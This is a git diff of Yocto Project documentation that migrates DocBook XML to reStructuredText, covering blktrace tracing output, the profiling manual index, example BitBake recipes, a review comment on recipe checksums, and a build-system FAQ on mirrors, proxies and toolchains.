- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing# cat trace_pipe
- cat-3587 [001] d..1 3023.276361: 8,32 Q R 1699848 + 8 [cat]
- cat-3587 [001] d..1 3023.276410: 8,32 m N cfq3587 alloced
- cat-3587 [001] d..1 3023.276415: 8,32 G R 1699848 + 8 [cat]
- cat-3587 [001] d..1 3023.276424: 8,32 P N [cat]
- cat-3587 [001] d..2 3023.276432: 8,32 I R 1699848 + 8 [cat]
- cat-3587 [001] d..1 3023.276439: 8,32 m N cfq3587 insert_request
- cat-3587 [001] d..1 3023.276445: 8,32 m N cfq3587 add_to_rr
- cat-3587 [001] d..2 3023.276454: 8,32 U N [cat] 1
- cat-3587 [001] d..1 3023.276464: 8,32 m N cfq workload slice:150
- cat-3587 [001] d..1 3023.276471: 8,32 m N cfq3587 set_active wl_prio:0 wl_type:2
- cat-3587 [001] d..1 3023.276478: 8,32 m N cfq3587 fifo= (null)
- cat-3587 [001] d..1 3023.276483: 8,32 m N cfq3587 dispatch_insert
- cat-3587 [001] d..1 3023.276490: 8,32 m N cfq3587 dispatched a request
- cat-3587 [001] d..1 3023.276497: 8,32 m N cfq3587 activate rq, drv=1
- cat-3587 [001] d..2 3023.276500: 8,32 D R 1699848 + 8 [cat]
- </literallayout>
- And this turns off tracing for the specified device:
- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing# echo 0 > /sys/block/sdc/trace/enable
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='blktrace-documentation'>
- <title>Documentation</title>
-
- <para>
- Online versions of the man pages for the commands discussed
- in this section can be found here:
- <itemizedlist>
- <listitem><para><ulink url='http://linux.die.net/man/8/blktrace'>http://linux.die.net/man/8/blktrace</ulink>
- </para></listitem>
- <listitem><para><ulink url='http://linux.die.net/man/1/blkparse'>http://linux.die.net/man/1/blkparse</ulink>
- </para></listitem>
- <listitem><para><ulink url='http://linux.die.net/man/8/btrace'>http://linux.die.net/man/8/btrace</ulink>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The above manpages, along with manpages for the other
- blktrace utilities (btt, blkiomon, etc) can be found in the
- /doc directory of the blktrace tools git repo:
- <literallayout class='monospaced'>
- $ git clone git://git.kernel.dk/blktrace.git
- </literallayout>
- </para>
- </section>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual.rst b/documentation/profile-manual/profile-manual.rst
new file mode 100644
index 0000000000..5ec5b9e759
--- /dev/null
+++ b/documentation/profile-manual/profile-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==========================================
+Yocto Project Profiling and Tracing Manual
+==========================================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ profile-manual-intro
+ profile-manual-arch
+ profile-manual-usage
+ profile-manual-examples
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/profile-manual/profile-manual.xml b/documentation/profile-manual/profile-manual.xml
deleted file mode 100755
index 39cdb817d9..0000000000
--- a/documentation/profile-manual/profile-manual.xml
+++ /dev/null
@@ -1,199 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='profile-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/profile-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Yocto Project Profiling and Tracing Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.4</revnumber>
- <date>April 2013</date>
- <revremark>The initial document released with the Yocto Project 1.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.5</revnumber>
- <date>October 2013</date>
- <revremark>Released with the Yocto Project 1.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.6</revnumber>
- <date>April 2014</date>
- <revremark>Released with the Yocto Project 1.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.7</revnumber>
- <date>October 2014</date>
- <revremark>Released with the Yocto Project 1.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>Released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
- Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
- Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Profiling and Tracing Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="profile-manual-intro.xml"/>
-
- <xi:include href="profile-manual-arch.xml"/>
-
- <xi:include href="profile-manual-usage.xml"/>
-
- <xi:include href="profile-manual-examples.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb b/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb
new file mode 100644
index 0000000000..aa2beb9a9b
--- /dev/null
+++ b/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb
@@ -0,0 +1,9 @@
+DESCRIPTION = "GNU Helloworld application"
+SECTION = "examples"
+LICENSE = "GPLv3"
+LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
+
+SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
+SRC_URI[sha256sum] = "31e066137a962676e89f69d1b65382de95a7ef7d914b8cb956f41ea72e0f516b"
+
+inherit autotools-brokensep gettext
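Review bot: The two checksums in this new example recipe do different jobs, and nothing in the file says so. `SRC_URI[sha256sum]` pins the fetched `hello-${PV}.tar.gz`, while the `md5=` in `LIC_FILES_CHKSUM` only flags a change in the `COPYING` text and is not an integrity control on the source. Because the tarball name is derived from `${PV}`, anyone who copies this recipe to another version must regenerate the sha256 from a tarball verified out of band (presumably against the signature published with the release), not from whatever the first fetch returned. I would add a comment above the checksum line, e.g. `# Pins the fetched tarball; recompute from a verified download whenever PV changes.` A one-line comment on `inherit autotools-brokensep gettext` explaining why the brokensep variant is needed would also help, since the removed hello_2.3.bb inherited plain `autotools`.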
diff --git a/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb b/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb
deleted file mode 100644
index 5dfb0b30cf..0000000000
--- a/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb
+++ /dev/null
@@ -1,8 +0,0 @@
-DESCRIPTION = "GNU Helloworld application"
-SECTION = "examples"
-LICENSE = "GPLv3"
-LIC_FILES_CHKSUM = "file://COPYING;md5=adefda309052235aa5d1e99ce7557010"
-
-SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.bz2"
-
-inherit autotools
diff --git a/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb b/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
index b58d4d7bd1..c0c8986405 100644
--- a/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
+++ b/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
@@ -1,4 +1,4 @@
-require xorg-lib-common.inc
+require recipes-graphics/xorg-lib/xorg-lib-common.inc
DESCRIPTION = "X11 Pixmap library"
LICENSE = "X-BSD"
diff --git a/documentation/ref-manual/faq.rst b/documentation/ref-manual/faq.rst
new file mode 100644
index 0000000000..8c2b34be5f
--- /dev/null
+++ b/documentation/ref-manual/faq.rst
@@ -0,0 +1,464 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***
+FAQ
+***
+
+**Q:** How does Poky differ from :oe_home:`OpenEmbedded <>`?
+
+**A:** The term ``Poky`` refers to the specific reference build
+system that the Yocto Project provides. Poky is based on
+:term:`OpenEmbedded-Core (OE-Core)` and :term:`BitBake`. Thus, the
+generic term used here for the build system is the "OpenEmbedded build
+system." Development in the Yocto Project using Poky is closely tied to
+OpenEmbedded, with changes always being merged to OE-Core or BitBake
+first before being pulled back into Poky. This practice benefits both
+projects immediately.
+
+**Q:** My development system does not meet the required Git, tar, and
+Python versions. In particular, I do not have Python 3.5.0 or greater.
+Can I still use the Yocto Project?
+
+**A:** You can get the required tools on your host development system a
+couple different ways (i.e. building a tarball or downloading a
+tarball). See the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section for steps on how to update your build tools.
+
+**Q:** How can you claim Poky / OpenEmbedded-Core is stable?
+
+**A:** There are three areas that help with stability;
+
+- The Yocto Project team keeps :term:`OpenEmbedded-Core (OE-Core)` small and
+ focused, containing around 830 recipes as opposed to the thousands
+ available in other OpenEmbedded community layers. Keeping it small
+ makes it easy to test and maintain.
+
+- The Yocto Project team runs manual and automated tests using a small,
+ fixed set of reference hardware as well as emulated targets.
+
+- The Yocto Project uses an autobuilder, which provides continuous
+ build and integration tests.
+
+**Q:** How do I get support for my board added to the Yocto Project?
+
+**A:** Support for an additional board is added by creating a Board
+Support Package (BSP) layer for it. For more information on how to
+create a BSP layer, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual and the
+:doc:`../bsp-guide/bsp-guide`.
+
+Usually, if the board is not completely exotic, adding support in the
+Yocto Project is fairly straightforward.
+
+**Q:** Are there any products built using the OpenEmbedded build system?
+
+**A:** The software running on the `Vernier
+LabQuest <http://vernier.com/labquest/>`__ is built using the
+OpenEmbedded build system. See the `Vernier
+LabQuest <http://www.vernier.com/products/interfaces/labq/>`__ website
+for more information. There are a number of pre-production devices using
+the OpenEmbedded build system and the Yocto Project team announces them
+as soon as they are released.
+
+**Q:** What does the OpenEmbedded build system produce as output?
+
+**A:** Because you can use the same set of recipes to create output of
+various formats, the output of an OpenEmbedded build depends on how you
+start it. Usually, the output is a flashable image ready for the target
+device.
+
+**Q:** How do I add my package to the Yocto Project?
+
+**A:** To add a package, you need to create a BitBake recipe. For
+information on how to create a BitBake recipe, see the
+":ref:`dev-manual/dev-manual-common-tasks:writing a new recipe`"
+section in the Yocto Project Development Tasks Manual.
+
+**Q:** Do I have to reflash my entire board with a new Yocto Project
+image when recompiling a package?
+
+**A:** The OpenEmbedded build system can build packages in various
+formats such as IPK for OPKG, Debian package (``.deb``), or RPM. You can
+then upgrade the packages using the package tools on the device, much
+like on a desktop distribution such as Ubuntu or Fedora. However,
+package management on the target is entirely optional.
+
+**Q:** I see the error
+'``chmod: XXXXX new permissions are r-xrwxrwx, not r-xr-xr-x``'. What is
+wrong?
+
+**A:** You are probably running the build on an NTFS filesystem. Use
+``ext2``, ``ext3``, or ``ext4`` instead.
+
+**Q:** I see lots of 404 responses for files when the OpenEmbedded build
+system is trying to download sources. Is something wrong?
+
+**A:** Nothing is wrong. The OpenEmbedded build system checks any
+configured source mirrors before downloading from the upstream sources.
+The build system does this searching for both source archives and
+pre-checked out versions of SCM-managed software. These checks help in
+large installations because it can reduce load on the SCM servers
+themselves. The address above is one of the default mirrors configured
+into the build system. Consequently, if an upstream source disappears,
+the team can place sources there so builds continue to work.
+
+**Q:** I have machine-specific data in a package for one machine only
+but the package is being marked as machine-specific in all cases, how do
+I prevent this?
+
+**A:** Set ``SRC_URI_OVERRIDES_PACKAGE_ARCH`` = "0" in the ``.bb`` file
+but make sure the package is manually marked as machine-specific for the
+case that needs it. The code that handles
+``SRC_URI_OVERRIDES_PACKAGE_ARCH`` is in the
+``meta/classes/base.bbclass`` file.
+
+**Q:** I'm behind a firewall and need to use a proxy server. How do I do
+that?
+
+**A:** Most source fetching by the OpenEmbedded build system is done by
+``wget`` and you therefore need to specify the proxy settings in a
+``.wgetrc`` file, which can be in your home directory if you are a
+single user or can be in ``/usr/local/etc/wgetrc`` as a global user
+file.
+
+Following is the applicable code for setting various proxy types in the
+``.wgetrc`` file. By default, these settings are disabled with comments.
+To use them, remove the comments: ::
+
+ # You can set the default proxies for Wget to use for http, https, and ftp.
+ # They will override the value in the environment.
+ #https_proxy = http://proxy.yoyodyne.com:18023/
+ #http_proxy = http://proxy.yoyodyne.com:18023/
+ #ftp_proxy = http://proxy.yoyodyne.com:18023/
+
+ # If you do not want to use proxy at all, set this to off.
+ #use_proxy = on
+
+The Yocto Project also includes a
+``meta-poky/conf/site.conf.sample`` file that shows how to configure CVS
+and Git proxy servers if needed. For more information on setting up
+various proxy types and configuring proxy servers, see the
+":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+Wiki page.
+
+**Q:** What's the difference between target and target\ ``-native``?
+
+**A:** The ``*-native`` targets are designed to run on the system being
+used for the build. These are usually tools that are needed to assist
+the build in some way such as ``quilt-native``, which is used to apply
+patches. The non-native version is the one that runs on the target
+device.
+
+**Q:** I'm seeing random build failures. Help?!
+
+**A:** If the same build is failing in totally different and random
+ways, the most likely explanation is:
+
+- The hardware you are running the build on has some problem.
+
+- You are running the build under virtualization, in which case the
+ virtualization probably has bugs.
+
+The OpenEmbedded build system processes a massive amount of data that
+causes lots of network, disk and CPU activity and is sensitive to even
+single-bit failures in any of these areas. True random failures have
+always been traced back to hardware or virtualization issues.
+
+**Q:** When I try to build a native recipe, the build fails with
+``iconv.h`` problems.
+
+**A:** If you get an error message that indicates GNU ``libiconv`` is
+not in use but ``iconv.h`` has been included from ``libiconv``, you need
+to check to see if you have a previously installed version of the header
+file in ``/usr/local/include``.
+::
+
+ #error GNU libiconv not in use but included iconv.h is from libiconv
+
+If you find a previously installed
+file, you should either uninstall it or temporarily rename it and try
+the build again.
+
+This issue is just a single manifestation of "system leakage" issues
+caused when the OpenEmbedded build system finds and uses previously
+installed files during a native build. This type of issue might not be
+limited to ``iconv.h``. Be sure that leakage cannot occur from
+``/usr/local/include`` and ``/opt`` locations.
+
+**Q:** What do we need to ship for license compliance?
+
+**A:** This is a difficult question and you need to consult your lawyer
+for the answer for your specific case. It is worth bearing in mind that
+for GPL compliance, there needs to be enough information shipped to
+allow someone else to rebuild and produce the same end result you are
+shipping. This means sharing the source code, any patches applied to it,
+and also any configuration information about how that package was
+configured and built.
+
+You can find more information on licensing in the
+":ref:`overview-manual/overview-manual-development-environment:licensing`"
+section in the Yocto
+Project Overview and Concepts Manual and also in the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+**Q:** How do I disable the cursor on my touchscreen device?
+
+**A:** You need to create a form factor file as described in the
+":ref:`bsp-filelayout-misc-recipes`" section in
+the Yocto Project Board Support Packages (BSP) Developer's Guide. Set
+the ``HAVE_TOUCHSCREEN`` variable equal to one as follows:
+::
+
+ HAVE_TOUCHSCREEN=1
+
+**Q:** How do I make sure connected network interfaces are brought up by
+default?
+
+**A:** The default interfaces file provided by the netbase recipe does
+not automatically bring up network interfaces. Therefore, you will need
+to add a BSP-specific netbase that includes an interfaces file. See the
+":ref:`bsp-filelayout-misc-recipes`" section in
+the Yocto Project Board Support Packages (BSP) Developer's Guide for
+information on creating these types of miscellaneous recipe files.
+
+For example, add the following files to your layer: ::
+
+ meta-MACHINE/recipes-bsp/netbase/netbase/MACHINE/interfaces
+ meta-MACHINE/recipes-bsp/netbase/netbase_5.0.bbappend
+
+**Q:** How do I create images with more free space?
+
+**A:** By default, the OpenEmbedded build system creates images that are
+1.3 times the size of the populated root filesystem. To affect the image
+size, you need to set various configurations:
+
+- *Image Size:* The OpenEmbedded build system uses the
+ :term:`IMAGE_ROOTFS_SIZE` variable to define
+ the size of the image in Kbytes. The build system determines the size
+ by taking into account the initial root filesystem size before any
+ modifications such as requested size for the image and any requested
+ additional free disk space to be added to the image.
+
+- *Overhead:* Use the
+ :term:`IMAGE_OVERHEAD_FACTOR` variable
+ to define the multiplier that the build system applies to the initial
+ image size, which is 1.3 by default.
+
+- *Additional Free Space:* Use the
+ :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+ variable to add additional free space to the image. The build system
+ adds this space to the image after it determines its
+ ``IMAGE_ROOTFS_SIZE``.
+
+**Q:** Why don't you support directories with spaces in the pathnames?
+
+**A:** The Yocto Project team has tried to do this before but too many
+of the tools the OpenEmbedded build system depends on, such as
+``autoconf``, break when they find spaces in pathnames. Until that
+situation changes, the team will not support spaces in pathnames.
+
+**Q:** How do I use an external toolchain?
+
+**A:** The toolchain configuration is very flexible and customizable. It
+is primarily controlled with the ``TCMODE`` variable. This variable
+controls which ``tcmode-*.inc`` file to include from the
+``meta/conf/distro/include`` directory within the :term:`Source Directory`.
+
+The default value of ``TCMODE`` is "default", which tells the
+OpenEmbedded build system to use its internally built toolchain (i.e.
+``tcmode-default.inc``). However, other patterns are accepted. In
+particular, "external-\*" refers to external toolchains. One example is
+the Sourcery G++ Toolchain. The support for this toolchain resides in
+the separate ``meta-sourcery`` layer at
+http://github.com/MentorEmbedded/meta-sourcery/.
+
+In addition to the toolchain configuration, you also need a
+corresponding toolchain recipe file. This recipe file needs to package
+up any pre-built objects in the toolchain such as ``libgcc``,
+``libstdcc++``, any locales, and ``libc``.
+
+**Q:** How does the OpenEmbedded build system obtain source code and
+will it work behind my firewall or proxy server?
+
+**A:** The way the build system obtains source code is highly
+configurable. You can setup the build system to get source code in most
+environments if HTTP transport is available.
+
+When the build system searches for source code, it first tries the local
+download directory. If that location fails, Poky tries
+:term:`PREMIRRORS`, the upstream source, and then
+:term:`MIRRORS` in that order.
+
+Assuming your distribution is "poky", the OpenEmbedded build system uses
+the Yocto Project source ``PREMIRRORS`` by default for SCM-based
+sources, upstreams for normal tarballs, and then falls back to a number
+of other mirrors including the Yocto Project source mirror if those
+fail.
+
+As an example, you could add a specific server for the build system to
+attempt before any others by adding something like the following to the
+``local.conf`` configuration file: ::
+
+ PREMIRRORS_prepend = "\
+ git://.*/.* http://www.yoctoproject.org/sources/ \n \
+ ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+ http://.*/.* http://www.yoctoproject.org/sources/ \n \
+ https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+These changes cause the build system to intercept Git, FTP, HTTP, and
+HTTPS requests and direct them to the ``http://`` sources mirror. You
+can use ``file://`` URLs to point to local directories or network shares
+as well.
+
+Aside from the previous technique, these options also exist:
+::
+
+ BB_NO_NETWORK = "1"
+
+This statement tells BitBake to issue an error
+instead of trying to access the Internet. This technique is useful if
+you want to ensure code builds only from local sources.
+
+Here is another technique:
+::
+
+ BB_FETCH_PREMIRRORONLY = "1"
+
+This statement
+limits the build system to pulling source from the ``PREMIRRORS`` only.
+Again, this technique is useful for reproducing builds.
+
+Here is another technique:
+::
+
+ BB_GENERATE_MIRROR_TARBALLS = "1"
+
+This
+statement tells the build system to generate mirror tarballs. This
+technique is useful if you want to create a mirror server. If not,
+however, the technique can simply waste time during the build.
+
+Finally, consider an example where you are behind an HTTP-only firewall.
+You could make the following changes to the ``local.conf`` configuration
+file as long as the ``PREMIRRORS`` server is current: ::
+
+ PREMIRRORS_prepend = "\
+ ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+ http://.*/.* http://www.yoctoproject.org/sources/ \n \
+ https://.*/.* http://www.yoctoproject.org/sources/ \n"
+ BB_FETCH_PREMIRRORONLY = "1"
+
+These changes would cause the build system to successfully fetch source
+over HTTP and any network accesses to anything other than the
+``PREMIRRORS`` would fail.
+
+The build system also honors the standard shell environment variables
+``http_proxy``, ``ftp_proxy``, ``https_proxy``, and ``all_proxy`` to
+redirect requests through proxy servers.
+
+.. note::
+
+ You can find more information on the
+ ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+ Wiki page.
+
+**Q:** Can I get rid of build output so I can start over?
+
+**A:** Yes - you can easily do this. When you use BitBake to build an
+image, all the build output goes into the directory created when you run
+the build environment setup script (i.e.
+:ref:`structure-core-script`). By default, this :term:`Build Directory`
+is named ``build`` but can be named
+anything you want.
+
+Within the Build Directory, is the ``tmp`` directory. To remove all the
+build output yet preserve any source code or downloaded files from
+previous builds, simply remove the ``tmp`` directory.
+
+**Q:** Why do ``${bindir}`` and ``${libdir}`` have strange values for
+``-native`` recipes?
+
+**A:** Executables and libraries might need to be used from a directory
+other than the directory into which they were initially installed.
+Complicating this situation is the fact that sometimes these executables
+and libraries are compiled with the expectation of being run from that
+initial installation target directory. If this is the case, moving them
+causes problems.
+
+This scenario is a fundamental problem for package maintainers of
+mainstream Linux distributions as well as for the OpenEmbedded build
+system. As such, a well-established solution exists. Makefiles,
+Autotools configuration scripts, and other build systems are expected to
+respect environment variables such as ``bindir``, ``libdir``, and
+``sysconfdir`` that indicate where executables, libraries, and data
+reside when a program is actually run. They are also expected to respect
+a ``DESTDIR`` environment variable, which is prepended to all the other
+variables when the build system actually installs the files. It is
+understood that the program does not actually run from within
+``DESTDIR``.
+
+When the OpenEmbedded build system uses a recipe to build a
+target-architecture program (i.e. one that is intended for inclusion on
+the image being built), that program eventually runs from the root file
+system of that image. Thus, the build system provides a value of
+"/usr/bin" for ``bindir``, a value of "/usr/lib" for ``libdir``, and so
+forth.
+
+Meanwhile, ``DESTDIR`` is a path within the :term:`Build Directory`.
+However, when the recipe builds a
+native program (i.e. one that is intended to run on the build machine),
+that program is never installed directly to the build machine's root
+file system. Consequently, the build system uses paths within the Build
+Directory for ``DESTDIR``, ``bindir`` and related variables. To better
+understand this, consider the following two paths where the first is
+relatively normal and the second is not:
+
+.. note::
+
+ Due to these lengthy examples, the paths are artificially broken
+ across lines for readability.
+
+::
+
+ /home/maxtothemax/poky-bootchart2/build/tmp/work/i586-poky-linux/zlib/
+ 1.2.8-r0/sysroot-destdir/usr/bin
+
+ /home/maxtothemax/poky-bootchart2/build/tmp/work/x86_64-linux/
+ zlib-native/1.2.8-r0/sysroot-destdir/home/maxtothemax/poky-bootchart2/
+ build/tmp/sysroots/x86_64-linux/usr/bin
+
+Even if the paths look unusual,
+they both are correct - the first for a target and the second for a
+native recipe. These paths are a consequence of the ``DESTDIR``
+mechanism and while they appear strange, they are correct and in
+practice very effective.
+
+**Q:** The files provided by my ``*-native`` recipe do not appear to be
+available to other recipes. Files are missing from the native sysroot,
+my recipe is installing to the wrong place, or I am getting permissions
+errors during the do_install task in my recipe! What is wrong?
+
+**A:** This situation results when a build system does not recognize the
+environment variables supplied to it by :term:`BitBake`. The
+incident that prompted this FAQ entry involved a Makefile that used an
+environment variable named ``BINDIR`` instead of the more standard
+variable ``bindir``. The makefile's hardcoded default value of
+"/usr/bin" worked most of the time, but not for the recipe's ``-native``
+variant. For another example, permissions errors might be caused by a
+Makefile that ignores ``DESTDIR`` or uses a different name for that
+environment variable. Check the the build system to see if these kinds
+of issues exist.
+
+**Q:** I'm adding a binary in a recipe but it's different in the image, what is
+changing it?
+
+**A:** The first most obvious change is the system stripping debug symbols from
+it. Setting :term:`INHIBIT_PACKAGE_STRIP` to stop debug symbols being stripped and/or
+:term:`INHIBIT_PACKAGE_DEBUG_SPLIT` to stop debug symbols being split into a separate
+file will ensure the binary is unchanged. The other less obvious thing that can
+happen is prelinking of the image. This is set by default in local.conf via
+:term:`USER_CLASSES` which can contain 'image-prelink'. If you remove that, the
+image will not be prelinked meaning the binaries would be unchanged.
diff --git a/documentation/ref-manual/faq.xml b/documentation/ref-manual/faq.xml
deleted file mode 100644
index d94cb32a86..0000000000
--- a/documentation/ref-manual/faq.xml
+++ /dev/null
@@ -1,835 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='faq'>
-<title>FAQ</title>
-<qandaset>
- <qandaentry>
- <question>
- <para>
- How does Poky differ from <ulink url='&OE_HOME_URL;'>OpenEmbedded</ulink>?
- </para>
- </question>
- <answer>
- <para>
- The term "<link link='poky'>Poky</link>"
- refers to the specific reference build system that
- the Yocto Project provides.
- Poky is based on <link linkend='oe-core'>OE-Core</link>
- and <link linkend='bitbake-term'>BitBake</link>.
- Thus, the generic term used here for the build system is
- the "OpenEmbedded build system."
- Development in the Yocto Project using Poky is closely tied to OpenEmbedded, with
- changes always being merged to OE-Core or BitBake first before being pulled back
- into Poky.
- This practice benefits both projects immediately.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para id='faq-not-meeting-requirements'>
- My development system does not meet the
- required Git, tar, and Python versions.
- In particular, I do not have Python 3.5.0 or greater.
- Can I still use the Yocto Project?
- </para>
- </question>
- <answer>
- <para>
- You can get the required tools on your host development
- system a couple different ways (i.e. building a tarball or
- downloading a tarball).
- See the
- "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
- section for steps on how to update your build tools.
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How can you claim Poky / OpenEmbedded-Core is stable?
- </para>
- </question>
- <answer>
- <para>
- There are three areas that help with stability;
- <itemizedlist>
- <listitem><para>The Yocto Project team keeps
- <link linkend='oe-core'>OE-Core</link> small
- and focused, containing around 830 recipes as opposed to the thousands
- available in other OpenEmbedded community layers.
- Keeping it small makes it easy to test and maintain.</para></listitem>
- <listitem><para>The Yocto Project team runs manual and automated tests
- using a small, fixed set of reference hardware as well as emulated
- targets.</para></listitem>
- <listitem><para>The Yocto Project uses an autobuilder,
- which provides continuous build and integration tests.</para></listitem>
- </itemizedlist>
- </para>
- </answer>
- </qandaentry>
-
- <qandaentry>
- <question>
- <para>
- How do I get support for my board added to the Yocto Project?
- </para>
- </question>
- <answer>
- <para>
- Support for an additional board is added by creating a
- Board Support Package (BSP) layer for it.
- For more information on how to create a BSP layer, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual and the
